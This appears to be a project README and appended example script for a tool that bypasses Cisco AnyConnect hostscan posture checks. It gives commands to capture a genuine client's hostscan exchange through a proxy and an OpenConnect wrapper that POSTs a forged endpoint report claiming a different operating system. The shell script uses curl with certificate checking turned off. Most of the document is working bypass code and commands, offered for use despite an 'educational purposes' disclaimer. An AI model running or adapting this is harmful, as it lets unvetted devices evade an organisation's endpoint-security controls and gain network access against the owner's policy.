Generate OpenConnect CSD files to bypass Cisco AnyConnect hostscan requirements
Generate an OpenConnect Cisco Secure Desktop (CSD) file that bypasses AnyConnect hostscan requirements.
This script captures and parses a genuine AnyConnect client connection and outputs a CSD wrapper script for OpenConnect. When OpenConnect runs that script, it performs a POST request to the AnyConnect server that replays the hostscan result, giving the server the illusion that a hostscan took place. This works even if the AnyConnect server does not publish hostscan binaries for your operating system (OS), because OpenConnect lets you specify which OS you claim to be connecting from. You can be on a Linux box and present yourself as a Windows client.
WARNING: Doing this bypasses the checks hostscan performs, which may be against your company's policy. You use this script and the resulting CSD file at your own risk. The script is provided for educational purposes only.
The hostscan bypass was originally coded and tested against a Windows machine running AnyConnect. I do not personally have the resources to troubleshoot issues on macOS. However, @cjbirk did a bit of troubleshooting and successfully generated a CSD file using the bypass on macOS. Please see this issue for suggestions on troubleshooting any Mac-related issues.
You can find the associated blog post for this tool here.
Note: you will need to install Go; that process is not covered here.
Run the proxy with `-r` pointed at the AnyConnect server, then connect a genuine AnyConnect client through it so the hostscan exchange can be captured:

```
sudo go run hostscan-bypass.go -l -p 443 -r :443 -s
```

Make the generated wrapper script executable:

```
chmod +x hostscan-bypass.sh
```

Connect with OpenConnect, pointing it at the wrapper and at the OS you want to claim (`--os=win` presents a Windows client; openconnect also expects the VPN server hostname as its positional argument):

```
sudo openconnect --csd-wrapper=hostscan-bypass.sh --os=win
```
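The wrapper OpenConnect runs at the `--csd-wrapper` step is just a script that OpenConnect invokes with the scan ticket and that POSTs a scan result back to the server. The skeleton below is an added example of that interface; it is not the project's generated hostscan-bypass.sh and not OpenConnect's bundled csd-post.sh. It assumes the argument form OpenConnect uses (`-ticket`, `-stub`, `-group`, `-certhash`, `-url`, `-langselen`, with values wrapped in literal double-quote characters, plus `CSD_HOSTNAME` and `CSD_TOKEN` in the environment); the `/+CSCOE+/sdesktop/scan.xml` endpoint, the `sdesktop` cookie and the `endpoint.*` report fields follow the csd-post.sh convention and should be treated as assumptions to verify against a captured session. A real bypass replays the exact fields a genuine client submitted rather than the generic ones here.

```shell
#!/bin/sh
# Added example: skeleton of an OpenConnect --csd-wrapper script.
# Not the project's hostscan-bypass.sh. OpenConnect runs the wrapper as
#   wrapper -ticket "TOKEN" -stub "0" -group "GROUP" -certhash "HASH" -url "URL" -langselen
# (values carry literal double quotes) and exports CSD_HOSTNAME / CSD_TOKEN.
# Endpoint path, cookie name and report fields are assumptions (csd-post.sh style).

strip_quotes() { printf '%s' "$1" | tr -d '"'; }

# Parse the wrapper argv into TICKET, STUB, GROUP, CERTHASH and URL.
parse_csd_args() {
    TICKET='' STUB='' GROUP='' CERTHASH='' URL=''
    while [ $# -gt 0 ]; do
        case "$1" in
            -ticket)    shift; TICKET=$(strip_quotes "$1") ;;
            -stub)      shift; STUB=$(strip_quotes "$1") ;;
            -group)     shift; GROUP=$(strip_quotes "$1") ;;
            -certhash)  shift; CERTHASH=$(strip_quotes "$1") ;;
            -url)       shift; URL=$(strip_quotes "$1") ;;   # may be URL-encoded
            -langselen) ;;                                    # bare flag, no value
        esac
        shift
    done
}

# URL the fake scan result is POSTed to (assumed path, csd-post.sh convention).
csd_scan_url() { printf 'https://%s/+CSCOE+/sdesktop/scan.xml?reusebrowser=1' "$1"; }

# Build a hostscan report body claiming the given OS ($1) and device name ($2).
# The field set is an assumption; replay captured fields for a real server.
build_hostscan_report() {
    printf 'endpoint.os.version="%s";\n' "$1"
    printf 'endpoint.os.servicepack="64";\n'
    printf 'endpoint.os.architecture="x64";\n'
    printf 'endpoint.policy.location="Default";\n'
    printf 'endpoint.device.protection="none";\n'
    printf 'endpoint.device.protection_version="3.1.03103";\n'
    printf 'endpoint.device.hostname="%s";\n' "$2"
    printf 'endpoint.device.id="%s";\n' "$2"
}

# Number of lines in the report body; lets the shape be checked without a network.
report_line_count() { build_hostscan_report "$1" "$2" | wc -l | tr -d ' '; }

# Entry point used when OpenConnect invokes the script with arguments.
csd_main() {
    parse_csd_args "$@"
    host=${CSD_HOSTNAME:?CSD_HOSTNAME not set by OpenConnect}
    token=${CSD_TOKEN:-$TICKET}
    report=$(mktemp) || return 1
    build_hostscan_report "Windows 10" "$(uname -n)" > "$report"
    # OpenConnect already authenticated the server; curl cannot reuse that trust
    # decision, so -k is used here. Pin the server certificate in a real deployment.
    curl -sS -k --fail \
        -H 'Content-Type: text/xml; charset=utf-8' \
        -H "Cookie: sdesktop=$token" \
        --data-binary "@$report" \
        "$(csd_scan_url "$host")" > /dev/null
    status=$?
    rm -f "$report"
    return "$status"
}

# With no arguments the script only defines its functions (sourcing / testing);
# OpenConnect always passes arguments, which triggers the POST.
if [ $# -gt 0 ]; then csd_main "$@"; exit $?; fi
```

Installed as `--csd-wrapper=/path/to/script`, the POST runs once per connection attempt; without arguments the script only defines its functions, so the argument parsing can be exercised without a VPN server.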